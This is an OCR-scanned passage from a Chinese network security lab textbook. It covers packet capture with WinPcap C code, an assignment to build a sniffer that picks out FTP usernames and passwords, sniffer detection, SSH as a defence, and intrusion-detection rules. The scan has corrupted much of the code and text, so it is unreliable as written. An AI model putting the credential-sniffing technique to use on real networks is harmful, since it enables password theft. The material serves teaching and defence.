ip address daddr; // Destination address 

u int op pad; // Option * Padding 

)ip header; 


/* UDP header*/ 
typedefstruct udp header( 


u short sport; // Source port 
u short dport; // Destination port 
u short len; // Datagram length 
u short crc; // Checksum 

)udp header; 


/* prototype of the packet handler */ 
void packet handler(u char *param, conststruct pcap pkthdr *header, 
const u char *pkt data); 


main() 
{ 
pcap if t *alldevs, *d; 
int inum,i-0; 
pcap t *adhandle; 
char errbuf[PCAP ERRBUF SIZE]; 
u int netmask; 
char packet filter[] - "ip and udp"; 
struct bpf program fcode; 


/* Retrieve the device list */ 
if (pcap findalldevs(&alldevs, errbuf) -- -1) 
{ 
fprintf(stderr,"Error in pcap findalldevs: %s\n", 
errbuf);exit(1); 
) 
/* Print the list */ 
for(d-alldevs; d; d-d-»next) 
{ 
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printf("%d. $s", ++i, d->name); 
if (d->description) 
printf(" (%s)\n", d->description) ; 
else 
printf(" (No description available) \n"); 
H 
if(i--0) 
{ 
printf ("\nNo interfaces found! Make sure WinPcap is installed.\n"); 
return -1; 
} 
printf ("Enter the interface number (1-$d):",i); 
scanf ("%d", &inum); 
if(inum < 1 || inum > i) 
{ 
printf("\nInterface number out of range.\n"); 
pcap_freealldevs (alldevs) ; /* Free the device list */ 
return -1; 
} 
/* Jump to the selected adapter */ 
for(d=alldevs, i-0; i< inum-1 ;d=d->next, i++); 
/* Open the adapter */ 


if ( (adhandle- pcap_open_live(d->name, // name of the device 
65536, // portion of the packet to capture. 
i, // promiscuous mode 
1000, // read timeout 
errbuf // error buffer 
) ) == NULL) 


fprintf (stderr,"MnUnable to open the adapter. $s is not supported 
by WinPcapWn"); 
pcap freealldevs (alldevs); /* Free the device list */ 
return -1; 
) 
/* Check the link layer. We support only Ethernet for simplicity. */ 
if(pcap datalink(adhandle) !- DLT_EN10MB) 
{ 
fprintf(stderr,"\nThis program works only on Ethernet 
networks.Nn"); 
pcap freealldevs(alldevs);  /* Free the device list */ 
return -1; 
i 
if(d->addresses != NULL) 
/* Retrieve the mask of the first address of the interface */ 
netmask-((struct sockaddr_in *) (d->addresses->netmask)) ->sin_ 
addr.S un.S addr; 


153 


mmm 网络 安全 实验 教程 (第 2 版 ) ES 


else 
/* If the interface is without addresses we suppose to be in a C class 
network */ 
netmask-Oxffffff; 
//compile the filter 
if(pcap compile(adhandle, &fcode, packet filter, 1, netmask) «0 )( 
fprintf(stderr,"\nUnable to compile the packet filter. Check 
the syntax. Mn"); 
/* Free the device list */ 
pcap freealldevs (alldevs); 
return -1; 
} 
//set the filter 
if(pcap setfilter(adhandle, &fcode) <0) { 
fprintf(stderr,"\nError setting the filter.\n"); 
pcap freealldevs (alldevs) ; /* Free the device list */ 
return -1; 
} 
printf("\nlistening on %s...\n", d->description) ; 
/* At this point, we don't need any more the device list. Free it */ 
pcap freealldevs (alldevs) ; 
pcap loop(adhandle, 0, packet handler, NULL); /* start the capture */ 
return 0; 
} 
/* Callback function invoked by libpcap for every incoming packet */ 
void packet handler(u char *param, conststruct pcap pkthdr *header, 
const u char *pkt data) 
{ 
struct tm *ltime; 
char timestr[16]; 
ip_header *ih; 
udp_header *uh; 
u_int ip_len; 
u_short sport,dport; 
/* convert the timestamp to readable format */ 
1time=localtime(&header->ts.tv_sec) ; 
strftime( timestr, sizeof timestr, "$H:$M:$S", ltime) ; 
/* print timestamp and length of the packet */ 
printf ("%s.%.6d len:$d ", timestr, header->ts.tv_usec, header->len) ; 
/* retireve the position of the ip header */ 
ih = (ip_header *) (pkt_data + 14); //length of ethernet header 
/* retireve the position of the udp header */ 
ip_len = (ih->ver_ihl & Oxf) * 4; 
uh = (udp_header *) ((u_char*)ih + ip_len); 
/* convert from network byte order to host byte order */ 
sport = ntohs( uh->sport ); 


154 


m—À X 12 3b 网 络 数 据 获取 与 监视 mmm 


dport = ntohs( uh->dport ); 
/* print ip addresses and udp ports */ 
printf ("%d.%d.%d.%d.%d -> %d.%d.%d.%d.%d\n", ih->saddr.bytel, 
ih->saddr.byte2, 
ih->saddr.byte3, ih-»saddr.byte4,sport,ih-»daddr.bytel, 
ih-»daddr.byte2, 
ih-»daddr.byte3,ih-»daddr.byte4, dport); 
} 


【实验 报告 】 
参考 给 出 的 代码 ， 实 现 一 个 能 够 自动 过 滤 FTP 用 户 名 和 密码 的 监听 程序 。 
【思考 题 】 


分 析 交 换 以 大 网 环境 下 监听 程序 的 工作 流程 , 设计 一 个 程序 实现 交换 环境 下 的 监听 。 
12.1.3 ”网 络 监听 检测 


【实验 目的 】 
掌握 检测 网 络 监 听 的 原理 和 一 般 技术 手段 。 
【原理 简介 】 


网 络 监听 工具 是 提供 给 管理 员 的 一 类 管理 工具 。 使 用 这 种 工具 ， 可 以 监视 网 络 的 状 


态 、 数 据 流动 情况 以 及 网 络 上 传输 的 信息 。 但 是 网 络 监 听 工 具 也 是 黑客 们 常用 的 工具 。 
当 信 息 以 明文 的 形式 在 网 络 上 传输 时 ， 便 可 以 使 用 网 络 监听 的 方式 来 进行 攻击 。 将 网 络 
接口 设置 在 监听 模式 ， 便 可 以 源源 不 断 地 将 网 上 传输 的 信息 截获 。 


x 


4 络 监听 可 以 在 网 上 的 任何 一 个 位 置 实施 ， 如 局 域 网 中 的 一 台 主机 、 网 关上 或 远程 


网 的 调制 解 调 器 之 间 等 。 黑 客 们 用 得 最 多 的 是 截获 用 户 的 口令 。 


3i 


络 监 听 是 很 难 被 发 现 的 ， 因 为 运行 网 络 监听 的 主机 只是 被 动 地 接收 在 局 域 网 上 传 


输 的 信息 ， 不 主动 地 与 其 他 主机 交换 信息 ， 也 没有 修改 在 网 上 传输 的 数据 包 。 


a 


可 能 存在 的 网 络 监听 的 检测 技术 主要 如 下 。 
CD 对 于 怀疑 运行 监听 程序 的 机 器 ,用 正确 的 IP 地 址 和 错误 的 物理 地 址 ping, 3517 


监听 程序 的 机 器 会 有 响应 。 这 是 因为 正常 的 机 器 不 接收 错误 的 物理 地 址 ， 处 理 监 听 状 态 
的 机 器 能 接收 ， 但 如 果 他 的 IPstack 不 再 次 反 向 检查 ， 就 会 响应 。 


(2) 向 网 上 发 大 量 不 存在 的 物理 地 址 的 包 ， 由 于 监听 程序 要 分 析 和 处 理 大 量 的 数据 


包 会 占用 很 多 的 CPU 资源 ， 这 将 导致 性 能 下 降 。 通 过 比较 前 后 该 机 器 性 能 加 以 判断 ， 这 
种 方法 难度 比较 大 。 


G) 使 用 反 监 听 工 具 如 AntiSni 企 等 进行 检测 。 
(4) 检查 网 卡 是 否 处 于 混杂 模式 ， 技 术 原理 如 下 。 
在 正常 情况 下 ， 就 是 说 不 在 混杂 模式 下 ， 网 卡 检测 是 不 是 广播 地 址 要 比较 看 收 到 的 


目的 以 太 网 址 是 否 等 于 任 企 任 任 仔仔 ， 是 则 认为 是 广播 地 址 。 在 混杂 模式 时 ， 网 卡 检测 是 
不 是 广播 地 址 只 看 收 到 包 的 目的 以 太 网 址 的 第 一 个 8 位 组 值 ,是 0x 任 则 认为 是 广播 地 址 。 
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利用 这 点 细微 差别 就 可 以 检测 出 Sniffer。 

Linux 环境 下 ， 当 混杂 模式 时 ， 每 个 包 都 被 传 到 了 操作 系统 内 核 以 处 理 。 在 处 理 某 
些 包 时 ， 只 看 IP 地 址 而 不 看 以 太 网 头 中 的 源 物理 地 址 。 所 以 ， 使 用 一 个 不 存在 的 目的 
MAC, 正确 的 目的 全 ， 受 影响 的 内 核 将 会 由 于 是 混杂 模式 而 处 理 它 ， 并 将 之 交 给 相应 系 
统 堆栈 处 理 ， 从 而 实现 检测 Sniffer。 

总 之 ， 只 要 发 一 个 以 太 网 头 中 目的 地 址 是 企 00.00.00.00.00 的 ARP 包 (LOpht 公司 
是 任 任 任 任 任 00) 就 可 以 检测 出 Linux 和 Windows 网 卡 处 于 混乱 状态 的 计算 机 。 


【实验 环境 】 
AntiSni 企 软件 ，Windows 操作 系统 环境 和 Linux 操作 系统 环境 。 


【实验 步骤 】 

1. Æ Linux 下 安装 、 使 用 混杂 模式 检测 器 

(1) 合作 双方 :以 root 身份 登录 进入 Linux. 

(2) 合作 双方 : 地址 http://downloads.securityfocus.com/tools/neped.c 获得 neped.c. 
(GO 合作 双方 : 使 用 以 下 命令 编译 。 


host#gcc neped.c-o neped 


(4) 合作 者 1: 执行 命令 host#tcpdump， 这 一 命令 的 用 意 是 将 网 卡 设 为 混杂 模式 ， 
可 能 需要 一 段 时 间 的 等 待 。 

(5) 合作 者 2: 执行 命令 host#./neped eth0， 检 测 网 段 中 所 有 的 标号 为 1 的 网 卡 ， 并 
且 报 告 哪些 网 卡 处 于 混杂 模式 。 

(6) 合作 者 2: 检测 完毕 后 ， 应 该 能 够 检测 到 子 网 内 的 所 有 处 于 混杂 模式 的 网 卡 。 

CD 合作 双方 : 互 换 角 色 ， 将 以 上 练习 重复 一 遍 。 

2. 使 用 AntiSniff 检测 工作 在 混杂 模式 下 的 网 卡 

(1) 合作 双方 : 以 Administrator 身份 登录 进入 Windows NT。 之 所 以 要 用 Adminis- 
trator 身份 登录 ， 是 因为 运行 AntiSniff 必须 要 有 管理 员 权 限 。 

(2) 合作 双方 : 获得 AntiSniff 安装 文件 包 ， 然 后 安装 AntiSniff。 安 装 过 程 中 ， 输 出 
文件 夹 应 该 是 CNTEMP\AntiSniff, 接受 所 有 默认 选项 ; 安装 完成 时 , 选中 Yes, Launch the 
program file 复 选 框 运行 以 后 ， 将 出 现 AntiSni 企 的 主 界面 ， 如 图 12-6 所 示 。 

G) 合作 双方 : 确信 AntiSniff 已 经 注册 了 你 的 网 卡 ， 接 下 来 就 可 以 开始 扫描 。 

(4) 合作 者 1: 登录 进入 Linux， 使 用 tepdump 将 网 卡 设 为 混杂 模式 。 

如 果 希 望 在 NT 下 完成 这 个 实验 ， 也 可 以 打开 Sniffer Pro 并 将 网 卡 置 于 混杂 模式 


(5) 合作 者 2: 在 AntiSniff 中 ,选择 Network Configure 选项 卡 ， 输 入 合作 伙伴 的 IP 
地 址 。 

如 果 想 扫描 网 段 中 的 连续 主机 ， 可 以 先 选中 Range 复 选 框 ， 然 后 输入 起 始 地 址 和 结 
束 地 址 。 
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4p Untitled — LOpht AntiSniff v1.02.1 
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图 12-6 AntiSniff 的 主 界面 


(6) 合作 者 2: 确信 合作 伙伴 已 将 网 卡 设置 成 混杂 模式 ， 然 后 开始 扫描 ; 注意 整个 
过 程 中 ，AntiSniff 将 进行 大 量 测试 ， 包 括 ARP 和 DNS 检查 、SYN flood 分 析 、Ping 

CD 合作 者 2: 一 段 时 间 后 ，AntiSniff 应 该 能 够 检测 出 合作 伙伴 的 网 卡 处 于 混杂 
式 ， 同 时 将 发 出 警告 信息 ， 单 击 警 告 窗口 关闭 ，AntiSniff 将 提示 出 哪 一 个 系统 的 网 卡 处 
于 混杂 模式 ， 同 时 要 求 检查 是 否 属实 ， 如 果 出 现 误 报 ， 只 要 单 击 No 即 可 。 检 测 结束 后 ， 
Hosts Tested 的 值 由 0 变 为 1， 这 时 可 以 选择 Reports 标签 查看 详细 信息 。 单 击 Report On 
Machine 按钮 。 

(8) 合作 双方 : 查看 报告 结果 ， 注 意 当 ICMP Test Timings 达到 极限 时 ，AntiSni 任 就 
会 发 出 警报 。 

AntiSniff 主要 针对 Sniffer 进行 检测 ， 无 论 对 方 采用 的 是 NT 还 是 Linux， 在 通常 情 
况 下 ， 使 用 AntiSniff 检测 被 怀疑 对 象 ， 而 不 是 整个 网 络 中 的 主机 。 


【实验 报告 】 
CD 详细 描述 实验 过 程 ， 分 析 监 测 结果 。 
(2) 针对 检测 误差 ， 分 析 原 因 。 


【思考 题 】 
针对 网 络 监听 攻击 的 原理 ， 分 析 现 有 的 防范 措施 的 优 缺 点 。 
12.1.4 ”网 络 监听 的 防范 


【实验 目的 】 
掌握 防范 网 络 监 听 的 主要 原理 和 技术 手段 。 
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【原理 简介 】 

根据 前 面 对 网 络 监听 的 了 解 ， 对 网 络 监听 的 防范 措施 主要 包括 以 下 几 个。 

1. 从 逻辑 或 物理 上 对 网 络 分 段 

网 络 分 段 通常 被 认为 是 控制 网 络 广播 风暴 的 一 种 基本 手段 ， 但 其 实 也 是 保证 网 络 安 
全 的 一 项 措施 。 其 目的 是 将 非法 用 户 与 敏感 的 网 络 资源 相互 隔离 ， 从 而 防止 可 能 的 非法 
监听 。 

2. 以 交换 式 集线器 代替 共享 式 集线器 

对 局 域 网 的 中 心 交 换 机 进行 网 络 分 段 后 ， 局 域 网 监听 的 危险 仍然 存在 。 这 是 因为 网 
络 最 终 用 户 的 接 入 往往 是 通过 分 支 集线器 而 不 是 中 心 交 换 机 ， 而 使 用 最 广泛 的 分 支 集 线 
器 通常 是 共享 式 集线器 。 这 样 ， 当 用 户 与 主机 进行 数据 通信 时 ， 两 台 机 器 之 间 的 数据 包 
( 称 为 单 播 包 Unicast Packet) 还 是 会 被 同一 台 集 线 器 上 的 其 他 用 户 所 监听 。 

因此 ， 应 该 以 交换 式 集线器 代替 共享 式 集线器 ， 使 单 播 包 仅 在 两 个 节点 之 间 传 送 ， 
从 而 防止 非法 监听 。 当 然 ， 交 换 式 集线器 只 能 控制 单 播 包 而 无 法 控制 广播 包 (Broadcast 
Packet) 和 多 播 包 (Multicast Packet)。 但 广播 包 和 多 播 包 内 的 关键 信息 ， 要 远 远 少 于 单 
播 包 。 

3. 使 用 加 密 技术 

数据 经 过 加 密 后 ， 通 过 监听 仍然 可 以 得 到 传送 的 信息 ， 但 显示 的 是 乱码 。 使 用 加 密 
技术 的 缺点 是 影响 数据 传输 速度 以 及 使 用 一 个 弱 加 密 术 比较 容易 被 攻破 。 系 统管 理 员 和 
用 户 需 要 在 网 络 速度 和 安全 性 上 进行 折 中 。 

4. 划分 VLAN 

运用 VLAN (虚拟 局 域 网 ) 技术 ， 将 以 太 网 通信 变 为 点 到 点 通信 ， 可 以 防止 大 部 分 
基于 网 络 监听 的 入 侵 。 

这 里 主要 讨论 加 密 技 术 来 防止 网 络 监 听 。 传 统 的 网 络 服务 程序 ,如 FTP、POP 和 Telnet 
在 传输 机 制 和 实现 原理 上 是 没有 考虑 安全 机 制 的 ， 其 本 质 上 都 是 不 安全 的 ;因为 它们 在 
网 络 上 用 明文 传送 数据 、 用 户 账 号 和 用 户口 令 ， 别 有 用 心 的 人 通过 窃听 等 网 络 攻击 手段 
非常 容易 地 就 可 以 截获 这 些 数据 、 用 户 账 号 和 用 户口 令 。SSH 是 英文 Secure Shell 的 简 
写 形式 。 通 过 使 用 SSH， 可 以 把 所 有 传输 的 数据 进行 加 密 ， 这 样 就 能 够 防止 网 络 监听 
也 能 够 防止 DNS 欺骗 和 IP 欺骗 。 使 用 SSH， 还 有 一 个 额外 的 好 处 就 是 传输 的 数据 是 经 
过 压缩 的 ， 所 以 可 以 加 快 传输 的 速度 。SSH 有 很 多 功能 ， 它 既 可 以 代替 Telnet， 又 可 以 
为 FTP、POP， 其 至 为 PPP 提供 一 个 安全 的 “通道 ”。 


【实验 环境 】 
Linux 操作 系统 安装 SSH 服务 器 ，Windows 操作 系统 安装 有 SSH 客户 端 。 


【实验 步骤 】 
1. SSH 加 密 传输 与 认证 
(1) 确信 合作 伙伴 的 sshd2 正常 运行 ， 否 则 应 该 提示 合作 伙伴 执行 以 下 命令 : 


host#/usr/local/sbin/sshd2 
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(2) 打开 Windows NT SSH 客户 端 程序 。 
(3) 按 Enter 键 或 空格 键 进行 连接 。 
(4) 输入 合作 伙伴 的 卫 地 址 ， 以 及 有 效 名 称 和 密码 ， 如 图 12-7 所 示 。 


x 
Host name or IP address: 
[301 — s 
User Name: ema | 
[ois z] 

Port: 
ez | 


Authentication Meth 1} X $ € 
Public Key 
Keyboard Interactive. 
Password 

GSSAPI 


图 12-7 配置 连接 信息 


在 这 一 步 , 不 要 企图 以 root 用 户 身份 连接 ， 因 为 在 默认 情况 下 ，Linux 不 允许 以 root 
身份 远程 连接 所 以 ， 应 该 以 非 root 用 户 连接 ， 然 后 使 用 su 命令 获得 root 权限 。 如 果 
有 必要 ， 应 该 实现 创建 一 个 非 root 账户 。 

(5) 在 Host Identification 对 话 框 中 ， 单 击 Yes 按钮 。 

(6) 完成 上 述 步骤 之 后 ， 就 获得 了 服务 器 端的 公 钥 ， 并 且 建 立 了 认证 关系 。 

(7) 打开 Edit 菜单 ， 选 择 Properties， 在 弹出 的 对 话 框 左 侧 的 树 状 结构 中 选择 Host 
Keys 节点 ， 应 该 看 到 从 服务 器 端 传 输 过 来 的 公 钥 。 

在 这 一 步 , 还 可 以 通过 选择 不 同 的 按钮 导入 (Import)、 导 出 (Export)、 删除 (Delete) 
主机 公 钥 文件 (注意 与 用 户 公 钥 文件 的 区 别 )。 

(8) 打开 Sniffer Pro， 开 始 捕 获 数据 包 ， 注 意 所 捕 到 的 数据 包 为 加 密 包 ， 可 见 通 过 
SSH 建立 了 安全 连接 。 

(9) 同时 建立 到 合作 伙伴 的 Telnet 会 话 和 SSH 会 话 ， 注 意 Sniffer Pro 所 捕获 的 数据 
包 的 差异 性 : 即 Telnet 连接 信息 是 可 见 的 、 不 加 密 的 ， 而 SSH 会 话 连接 会 对 相关 信息 进 
行 数据 加 密 ， 从 而 保障 了 通信 安全 。 

2. 通过 SSH 在 FTP 方式 下 安全 地 传输 文件 

(1) 打开 F-Secure SSH FTP. 

在 地 址 栏 中 可 以 输入 已 经 通过 SSH 认证 的 FTP 站 点 或 SSH 服务 器 端的 FTP 站 点 ， 
如 图 12-8 所 示 。 

(2) 在 File 菜单 中 ， 选 择 Connect。 

(3) 输入 合作 伙伴 的 主机 名 ， 以 及 有 效用 户 名 和 密码 ， 如 图 12-9 所 示 。 

(4) 单 击 Connect 按钮 。 

(5) 通过 上 述 步骤 ，SSH 客户 将 通过 认证 建立 起 一 个 安全 的 FTP 连接 。 

(6) 上 传 一 个 简单 的 文件 到 合作 伙伴 的 FTP 站 点 。 
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& - [defaultsftp] — F-Secure SSH File Transfer 


file Edit View Operation Window Help 
iE PAL E ssim Bir BrwrrHEs TTT @ en 
L] Quick Connect 回 Profiles 


Transfer | Queue | 
7 | Source File Source Directory _ Destination Dire... Size Status 


[Not connected - Press Enter/Spac 


图 12-8 F-Secure SSH FTP 


Connect to Remote Host 


Host name or IP address: 


Cancel 


User Mane: 
I 


Port: 


[22 


Authentication Meth |] X $ +$ 
Password | 


图 12-9 连接 信息 


(7) 使 用 Sniffer Pro 捕获 数据 包 ， 查 看 数据 包 内 容 。 

(8) 打开 命令 行 提示 窗口 ， 使 用 命令 连接 到 合作 伙伴 。 

(9) 使 用 get 命 令 将 刚才 的 文件 下 载 。 

(10) 注意 观察 下 载 过 程 中 Sniffer Pro 所 捕捉 到 的 数据 包 ， 对 比 两 次 的 捕获 结果 。 

(11) Æ Edit XAF, EF% Setting， 打 开 Settings 对 话 框 ， 如 图 12-10 所 示 。 

在 这 一 步 ， 可 以 对 有 关 参 数 进行 详细 的 配置 ， 以 满足 当前 网 络 的 不 同 需求 ， 例 如 ， 
可 以 通过 选择 FTP Protocol 节点 编辑 匿名 登录 的 用 户 名 、 密 码 、 传 输 模 式 等 。 


【实验 报告 】 
详细 描述 实验 过 程 ， 对 比 使 用 加 密 技 术 前 后 系统 安全 性 差别 。 
【思考 题 】 


除 使 用 SSH 外 还 可 以 使 用 哪些 技术 来 防范 网 络 监听 ? 请 对 比 这 些 技术 的 优 缺点 。 
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"c Connection 


Configure the protocol settings for e connection. New 
E Keyboard settings will take effe RE login. 
Keyboard Mappings 


Host name or IP 


Port 
22 


Dicompression 

口 connect through Firew 

Date Connect On Open 

(Send No-Operation packets to the s 


Dimininize all windows after connection is e 


图 12-10 连接 配置 


122 ”网 络 和 主机 活动 监测 


12.2.1 ”实时 网 络 监测 


【实验 目的 】 
掌握 网 络 监测 的 内 容 与 方法 。 


【原理 简介 】 
网 络 监测 是 指 从 网 络 设备 上 采集 数据 ， 收 集 数据 ， 分 析 数 据 的 过 程 。 它 从 网 络 中 采 
a lagi mgs VLA ll a 
网 络 运行 动态 、 诊 断 可 能 存在 的 问题 ， 甚 至 预测 可 能 出 现 问题 的 “度量 值 ” 
MIC. ee ee 
网 络 监 测 对 网 络 使 用 者 非常 重要 ， 是 保护 重要 应 用 的 前 提 、 实 现 网 络 安全 的 手段 。 

SessionWall-3 是 CA 出 品 的 网 络 管理 和 防止 黑客 入 侵 的 软件 ， 基 于 网 络 的 内 置 大 量 
黑客 规则 ， 有 效 阻挡 黑客 和 病毒 的 攻击 。 可 以 随时 监控 网 络 内 的 所 有 机 器 ， 并 能 抓拍 和 
还 原 网 络 内 机 器 的 Internet 浏览 页 面 ， 捕 捉 所 有 电子 邮件 和 其 中 的 附件 ， 随 时 按 “ 端 口 / 
协议 /流量 /应 用 ” 阻 断 网 络 内 机 器 的 网 络 活动 。Session Wall-3 可 以 被 安装 到 任何 连接 到 网 
络 上 的 装 有 主流 操作 系统 的 机 器 上 。SessionWall-3 可 以 监测 到 整个 网 络 的 全 部 信息 。 这 
些 信息 包括 所 有 E-mail, Web 浏览 、 新 闻 、Telnet、FTP 活动 以 及 入 侵 企图 和 可 疑 的 网 络 
活动 。 

SessionWall-3 是 一 种 易于 使 用 的 软件 型 网 络 分 析 方 案 。 它 安装 简单 ， 不 需要 对 网 络 
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或 地 址 进行 任何 改动 ， 也 不 会 对 网 络 的 传输 造成 延迟 。 
输 内 容 进 行 扫描 、 显 示 、 报 告 、 记 录 和 报警 ， 并 提供 了 
易于 理解 的 方式 提供 了 相应 的 信息 。 


它 对 网 络 流量 进行 监听 ， 并 对 传 
全 面 地 查看 有 关内 容 的 途径 ， 以 


SessionWall-3 不 仅 保护 用 户 的 企业 不 会 出 现 内 部 的 滥用， 而 且 保护 用 户 网 络 不 受 外 


KARA 


攻击 。 它 包括 世界 级 的 监控 和 使 用 情况 查看 工具 、 入 侵 探测 和 拒绝 服务 型 攻击 


探测 引擎 ， 一 个 巨大 的 超过 400 000 个 分 类 站 点 清单 的 URL 控制 列表 ， 世 界 级 的 攻击 型 


Java/ActiveX 探测 引擎 和 病毒 探测 引擎 。 


SessionWall-3 的 报表 功能 十 分 丰富 ， 可 产生 50 多 种 报表 ， 公 司 的 技术 人 员 通 过 在 
Report Scheduler 中 制定 所 需 报 表 ， 将 报表 结果 通过 E-mail 发 到 指定 信箱 (方式 可 自由 


选择 )。 
【实验 环境 】 
局 域 网 环境 ，SessionWall-3 。 


【实验 步骤 】 
1. 使 用 SessionWall 监控 网 络 活动 


COD 单 击 【 开 始 】|【 程 序 】|SessionWalllSession Wall-3， 打 开 Session Wall. 
(2) 打开 WinNmap 配置 检测 合作 伙伴 的 系统 ， 即 将 target 定义 为 192.168.0.x Ox 为 


合作 伙伴 的 座位 号 )， 各 项 配置 如 图 12-11 所 示 。 


Hile View 
Tages): [132168.0.1 


Scan |Discover| Time | Options] File | 
‘Scan Type 


‘Scan Ports 


TCP SYN 


‘Scan Extensions 


[^ RPCScan [~ OS Detection [~ Version Probe 


3268/tcp open 
|3269/tcp open 
IMAC Address 


elobalcatLDAP 
elobalcatLDAPss1 
00:E0:4C:DD:14:F3 (Realtek Semiconductor) 


< 


Command: [nmap -sS -PE -PS 192.168.0.1 


图 12-11 WinNmap 配置 


(3) Hih Scan 按钮 开始 检测 。 
(4) 由 
加 的 信息 。 


于 合作 双方 进行 同样 的 练习 ， 可 以 从 Session Wall 中 看 到 指示 灯 闪 烁 和 流量 增 


(5) 在 SessionWall 的 工具 栏 中 ， 单 击 安全 检测 图 标 按钮 ， 打 开 Detected security 
violations 对 话 框 ， 可 以 看 到 系统 检测 出 TCP Port Scanning 攻击 ， 如 图 12-12 所 示 。 单 击 


Show Alert Message 按钮 ， 打 开 报 警 信息 ， 可 以 看 到 系 
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如 图 12-13 所 示 。 


Dx || 2? Dé x? 


TCP Port Scanning Mon, Oct 09,22:18 Mon, Oct 09,22:20 Target: ha. Subscription Alert Mon, Oct 09,2... 
SYN Attack Mon, Oct 09,22:20 Mon, Oct 09,22:20 — Target: ha. Subscription Alert Mon, Oct 09,2... 
A 


TCP Port Scan... Mon, Oct 09,2... 
A Suspicious Network Activity Syn Attack Alert Mon, Oct 09,2... 


Hi 
图 12-12 Detected security violations 对 话 框 图 12-13 Alert Message 对 话 框 


SessionWall 可 以 用 来 充当 实时 监测 系统 ， 直 接 的 图 标 报警 方式 较为 直观 ， 而 且 它 的 
检测 结果 非常 友好 、 易 于 分 析 ， 有 助 于 网 络 安全 审计 人 员 迅 速 做 出 反应 。 

2. 编辑 审计 规则 

(1) 打开 SessionWall。 

(2) 在 Functions 菜单 中 选择 Intrusion Attempt Detection Rules， 打 开 对 话 框 ， 如 
图 12-14 所 示 。 

G) 在 打开 的 对 话 框 中 单 击 左下 角 的 Edit Rules 按钮 ， 选 择 New|Insert Before 菜单 项 。 

(4) 输入 Telnet 作为 标示 名 称 ， 按 Enter 键 确认 。 

(5) 在 出 现 的 Client 对 话 框 中 ， 选 择 RANGE; 这 一 步 用 来 确定 规则 所 起 作用 的 主 
机 的 IP 地 址 的 范围 ， 如 图 12-15 所 示 。 


m "uon -- [mE 
DEBUG 9 station 9 stain | & detectior 

Iv Sendmail WIZ | Any E [intrusion (Intrusion d 
Command 9 station. É ie detect tior 7 es 

7 E-Mail Decode| 9 9. m tion 人 ntuson A 
attempt station station DX detection: 


ELS Dix, Oem. Fee 
Hit Rules. v] 


Cg roma 
C] YORISTATION USER) 
Gaor 


D xcu 


图 12-14 审计 规则 图 12-15 定义 Client 


(6) 单 击 Add 按钮 ， 打 开 Select Network Object Type 对 话 框 ， 如 图 12-16 所 示 。 

(7) 选择 RANGE， 然后 单 击 Add 按钮 打开 RANGE Properties 对 话 框 ， 范 围 名称 命 
名 为 Partner's IP， 分 别 输 入 自己 的 IP 地 址 和 合作 伙伴 的 IP 地 址 ， 然 后 单 击 OK 按钮 ， 
如 图 12-17 所 示 。 

(8) 在 Server 列表 框 中 设置 范围 为 本 机 地 址 。 

(9) 在 Type 选项 中 ， 双 击 空白 处 ， 出 现 如 图 12-18 所 示 的 对 话 框 ， 单 击 Add 按钮 。 

(10) 在 Rule“NetBios” 窗 口中 , 选择 Log It 图 标 以 记录 Telnet 活动 情况 , 如 图 12-19 
所 示 。 
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上 WORKSTATION USER(S) 
A comp 


Group of stations defined by a range 
of IP addresses. 


图 12-16 添加 Client 


Rule Type Properties 


Service 

FIP (ile Transfer) 
[ ae 
POP Cncoming Email) 
SIMP Outgoing Email) 
Que World Wide Web) 
ETP Dust 


Rule Type Criteria 
= Gy Service ' Telnet" 
O Include all 
‘© Login using specific usernar 
O Very Short/Long sessions 
© Failed logins 
‘© Match string in content 


< > 


© Block action can be applied to this Rule Type 


Cancel Help 
图 12-18 审计 事件 设置 


Action | 


75 


So RANGE Properties 


Hane: 
IP Bange 
Start 


End IP 


图 12-17 Client 设置 


Rule “NetBios” 


Action 

‘Active HIML content alert 
£f Block It 

£f Ensil notification to syst. 
E] Fax notification 

£f gore It 

£f Log and Encrypt 

ETE 

FJ [Intrision detection OnniK 
F] Untrision detection: WU- 
J [Intrusion detection Bootp. 
E] Intrusion detection FakeB. 
J (Intrusion detection File 
F] (Intrusion detection GirlF. 


F] (Intrusion detection Inetd 
E] (Intrusion detection Inetd 1 


Ad. Remove | roperties. J 


取消 EROA #88 
图 12-19 审计 动作 


(11) 选择 Properties， 然 后 选中 Windows NT Event Log 复 选 项 ， 如 图 12-20 所 示 。 
(12) 输入 一 个 文本 字符 串 用 来 在 检测 到 Telnet 登录 失败 活动 时 发 出 警报 文字 ， 单 


击 OK 按钮 。 


(13) 在 Time 对 话 框 中 ， 确 保 Always 复 选 框 被 选中 ， 如 图 12-21 所 示 。 
(14) 在 Description 对 话 框 中 ， 输 入 一 个 描述 名 称 ， 然 后 单 击 Next 按钮 。 


(15) 单 击 Finish 按钮 ，Intrusion Attempt Detection Rules 对 话 框 中 将 显示 刚 定义 的 


Telnet 规则 ， 接 下 来 将 对 Telnet 规则 定义 进行 测试 ， 如 图 12-22 所 示 。 


(16) 在 合作 者 的 机 器 中 打开 Telnet， 与 本 机 建立 一 个 连接 ， 尝 试 使 用 错误 的 用 户 名 


和 密码 进行 登录 。 


(17) 在 SessionWall 的 View 菜单 中 选择 Alert Message， 或 者 单 击 Show Alert 


Messages 按钮 。 
(18) 打开 Windows NT Event Viewer， 找 到 并 阅读 Telnet 项 。 


(19) 接 下 来 在 SessionWall 中 编辑 规则 禁止 Telnet 连接 ， 打 开 Functions 菜单 ， 选 择 
Intrusion Atternpt Detection Rules， 在 Intrusion Attempt Detection Rules 中 ， 单 击 Action 标 


签 ， 选 取 Block It 选项 ， 单 击 【 确 定 】 按 钮 ， 如 图 12-23 所 示 。 
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* Action Properties 


Name: 
flog It 


Action 


Days of the week 


fa is Tee fr [J 


Time frame 


(CB Define Blocking Rule 


(ide Alert Message 
Test > Stet — [00:00 =} 


Windows NT Event Log Einish | 25° 98 5 [7 


B 


Event 


[netbus error! 


图 12-20 日 志 信 息 图 12-21 ”监测 时 间 范 围 
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ROOT detection: tp ^ detection 
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DEBUG | S detection: detection ¥ 
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Edit Rules... vi Cancel Help 
图 12-22 ”生成 的 审计 规则 


Rule “Telnet” 


m" 


tes 


Action 
CJ Active HINL content alert 
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图 12-23 ”更 改 审计 动作 
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单 击 【确定 】 按 钮 后 ， 可 能 会 出 现 改 变 规则 可 能 会 终止 已 创建 的 规则 警告 ， 在 这 里 
不 必 理 会 。 除 去 选择 过 的 Log It 选 项 之 外 ， 还 可 以 使 用 Ignore It 加 以 忽略 ;使 用 Active 
HTML Content Alert 将 相关 信息 以 HTML 页 面 方 式 记录 并 发 送 ; 或 者 通过 E-mail 方式 发 
